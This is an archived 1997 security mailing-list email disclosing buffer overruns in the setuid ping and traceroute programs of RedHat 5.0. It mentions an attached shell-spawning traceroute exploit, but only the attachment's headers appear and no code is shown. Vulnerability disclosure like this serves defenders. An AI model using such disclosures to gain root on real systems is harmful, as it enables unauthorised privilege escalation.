X-RDate: Tue, 23 Dec 1997 12:40:55 +0500 (ESK)
Date: Sat, 13 Dec 1997 13:19:04 -0700
From: Wilton Wong - ListMail <listmail@NOVA.BLACKSTAR.NET>
To: best-of-security@cyber.com.au
Subject: BoS: Buffer Overrun in RedHat 5.0

This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to mime@docserver.cac.washington.edu for more info.

--1271824655-1441708142-882044343=:16755
Content-Type: TEXT/PLAIN; charset=US-ASCII

Just going through some setuid things and noticed that in RedHat 5.0 you
can overrun the buffers in /bin/ping and /usr/sbin/traceroute. I attached
an exploit for traceroute, nothing fancy, just what I had to test it with,
a simple eggshell.

Sorry if this has been mentioned before.

-- Wilton

-------------------------------------------------------------------------
Wilton Wong                           BlackStar Communications
URL: http://www.blackstar.net         16121 - 57 Street
Email: wwong@blackstar.net            Edmonton AB T5Y 2T1
Tel: (403) 486-7783                   Fax: (403) 484-6004
-------------------------------------------------------------------------

--1271824655-1441708142-882044343=:16755
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="trace_shell.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.3.96.971213131903.16755C@nova.blackstar.net>
Content-Description: exploit

--1271824655-1441708142-882044343=:16755--